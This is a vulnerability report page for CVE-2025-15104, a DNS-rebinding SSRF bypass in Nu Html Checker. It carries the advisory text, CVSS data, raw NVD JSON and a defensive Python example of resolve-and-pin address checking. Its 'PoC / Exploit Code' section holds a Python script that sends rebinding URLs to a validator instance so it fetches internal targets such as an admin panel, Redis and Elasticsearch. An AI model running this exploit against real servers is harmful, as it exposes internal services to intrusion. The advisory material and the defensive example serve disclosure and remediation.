Security Vulnerability Report
CVE-2025-15104 CVSS 5.3 MEDIUM

CVE-2025-15104

Published: 2026-01-16 14:15:54
Last Modified: 2026-01-23 16:57:19

Description

Nu Html Checker (validator.nu) contains a restriction bypass that allows remote attackers to make the server perform arbitrary HTTP/HTTPS requests to internal resources, including localhost services. While the validator implements hostname-based protections to block direct access to localhost and 127.0.0.1, these controls can be bypassed using DNS rebinding techniques or domains that resolve to loopback addresses. This issue affects The Nu Html Checker (vnu): latest (commit 23f090a11bab8d0d4e698f1ffc197a4fe226a9cd).
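The gap between a hostname string check and a check on the resolved address, shown as an added defensive example (not code from Nu Html Checker or from the advisory). The resolver objects, the `*.test.example` names and the zone data are constructed stand-ins for DNS so the block runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

BLOCKED_NAMES = {"localhost", "127.0.0.1"}  # hostname blocklist, as in the description
# Constructed zone data: ordinary-looking names whose records point at loopback.
ZONE = {"loop.test.example": ["127.0.0.1"], "mapped.test.example": ["::ffff:127.0.0.1"]}

def hostname_only_check(url):
    """Weak form: compares the hostname string, never what it resolves to."""
    return (urlsplit(url).hostname or "").lower() not in BLOCKED_NAMES

def is_public(addr):
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped:  # ::ffff:127.0.0.1 is still loopback
        ip = ip.ipv4_mapped
    return ip.is_global  # False for loopback, RFC 1918, link-local

def resolve_and_pin(url, resolver):
    """Resolve once, require every answer to be public, return the IP to dial.
    The caller connects to that IP (original Host/SNI) and never re-resolves."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("unsupported URL")
    addrs = resolver(parts.hostname)
    if not addrs or not all(is_public(a) for a in addrs):
        raise ValueError(f"{parts.hostname} does not resolve to a public address")
    return addrs[0]

class RebindingResolver:
    """Constructed stand-in for DNS: public answer first, loopback afterwards."""
    def __init__(self):
        self.calls = 0
    def __call__(self, name):
        self.calls += 1
        return ["8.8.8.8"] if self.calls == 1 else ["127.0.0.1"]

def demo():
    url = "http://loop.test.example/page.html"
    rebind = RebindingResolver()
    pinned = resolve_and_pin("http://rebind.test.example/", rebind)
    try:
        resolve_and_pin(url, lambda name: ZONE.get(name, []))
        hardened = "allowed"
    except ValueError:
        hardened = "blocked"
    return {"weak": hostname_only_check(url), "hardened": hardened,
            "pinned": pinned, "lookups": rebind.calls}

if __name__ == "__main__":
    print(demo())
```

Every redirect hop has to pass through the same resolve-and-pin step, since a redirect target is just another attacker-supplied URL.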

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:validator:validator:*:*:*:*:*:*:*:* - VULNERABLE
Nu Html Checker (vnu) < latest (commit 23f090a11bab8d0d4e698f1ffc197a4fe226a9cd)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import time

# CVE-2025-15104 PoC - DNS Rebinding SSRF Bypass
# Target: Nu Html Checker (vnu)


def exploit_nu_checker_ssrf(target_url, attacker_domain):
    """
    Exploit DNS rebinding to bypass SSRF protections in Nu Html Checker

    Args:
        target_url: URL of the vulnerable Nu Html Checker instance
        attacker_domain: Attacker's DNS rebinding domain
    """
    # Step 1: Set up DNS rebinding domain that first resolves to external IP,
    # then quickly switches to 127.0.0.1
    # This can be done using services like rbndr.us or custom DNS server
    rebind_domain = f"{attacker_domain}.rbndr.us"  # Example DNS rebinding service

    # Step 2: First request - domain resolves to external IP (passes check)
    payload = {
        'doc': f'http://{rebind_domain}/safe-endpoint'
    }

    # Step 3: Rapid second request - DNS cache expires, now resolves to 127.0.0.1
    # The validator will now fetch content from localhost
    internal_targets = [
        'http://127.0.0.1:8080/admin',
        'http://localhost:3000/api/config',
        'http://127.0.0.1:6379/',  # Redis
        'http://127.0.0.1:9200/_cluster/health'  # Elasticsearch
    ]

    for target in internal_targets:
        payload['doc'] = f'http://{rebind_domain}/redirect?url={target}'
        try:
            response = requests.post(
                f'{target_url}/?out=json',
                data=payload,
                timeout=5
            )
            print(f"Target: {target}")
            print(f"Status: {response.status_code}")
            print(f"Response: {response.text[:500]}")
        except requests.exceptions.RequestException as e:
            print(f"Error accessing {target}: {e}")


if __name__ == "__main__":
    # Configuration
    TARGET = "http://validator.example.com"
    ATTACKER_DOMAIN = "attacker-controlled-domain"
    exploit_nu_checker_ssrf(TARGET, ATTACKER_DOMAIN)
```

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15104", "sourceIdentifier": "[email protected]", "published": "2026-01-16T14:15:54.317", "lastModified": "2026-01-23T16:57:18.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nu Html Checker (validator.nu) contains a restriction bypass that allows remote attackers to make the server perform arbitrary HTTP/HTTPS requests to internal resources, including localhost services. While the validator implements hostname-based protections to block direct access to localhost and 127.0.0.1, these controls can be bypassed using DNS rebinding techniques or domains that resolve to loopback addresses.This issue affects The Nu Html Checker (vnu): latest (commit 23f090a11bab8d0d4e698f1ffc197a4fe226a9cd)."}, {"lang": "es", "value": "Nu Html Checker (validator.nu) contiene un bypass de restricción que permite a atacantes remotos hacer que el servidor realice solicitudes HTTP/HTTPS arbitrarias a recursos internos, incluyendo servicios de localhost. Si bien el validador implementa protecciones basadas en nombre de host para bloquear el acceso directo a localhost y 127.0.0.1, estos controles pueden ser eludidos utilizando técnicas de reasociación de DNS o dominios que se resuelven a direcciones de bucle invertido. 
Este problema afecta a The Nu Html Checker (vnu): la última versión (commit 23f090a11bab8d0d4e698f1ffc197a4fe226a9cd)."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", 
"scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:validator:validator:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026-01-11", "matchCriteriaId": "6A5FD28B-2330-4CF3-9170-0189849D2AB7"}]}]}], "references": [{"url": "https://fluidattacks.com/advisories/europe", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/validator/validator", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://fluidattacks.com/advisories/europe", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}